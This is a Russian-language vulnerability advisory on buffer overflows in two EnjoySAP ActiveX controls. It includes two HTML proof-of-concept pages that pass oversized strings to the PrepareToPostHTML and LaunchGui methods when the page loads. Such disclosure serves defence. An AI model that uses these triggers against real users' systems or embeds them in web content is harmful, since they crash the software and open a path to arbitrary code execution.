Программа: EnjoySAP ActiveX

Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код и осуществить DoS атаку на целевую систему. Уязвимость существует из-за ошибки в проверке входных данных в kweditcontrol.kwedit.1 (kwedit.dll) ActiveX компоненте в методе "PrepareToPostHTML()" и в rfcguisink.rfcguisink.1 ActiveX компоненте в методе "LaunchGui()". Атакующий может передать специально сформированные данные большого размера, что вызовет переполнение буфера и приведет к выполнению произвольного кода и отказу системы в обслуживании.

Пример:

<HTML>
<HEAD>
<META http-equiv=Content-Type content="text/html; charset=windows-1252">
<SCRIPT type=text/javascript>

function init()
{
var foo = "";

for(var icount = 0; icount < 1800; icount++)
{
 foo = foo + "x";
}
var ngssoftware;
ngssoftware = new ActiveXObject("rfcguisink.rfcguisink.1");

ngssoftware["LaunchGui"](foo, 1, 1);
}
//-->
</SCRIPT>

</HEAD>
<BODY bgColor=#ffffff onload=init()>
</BODY></HTML>

Пример:

<HTML>
<HEAD>
<META http-equiv=Content-Type content="text/html; charset=windows-1252">
<SCRIPT type=text/javascript>

function init()
{
var foo = "";

for(var icount = 0; icount < 1060; icount++)
{
 foo = foo + "x";
}
var ngssoftware;
ngssoftware = new ActiveXObject("kweditcontrol.kwedit.1");

ngssoftware["PrepareToPostHTML"](foo);
}
//-->
</SCRIPT>

</HEAD>
<BODY bgColor=#ffffff onload=init()>
</BODY></HTML>

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии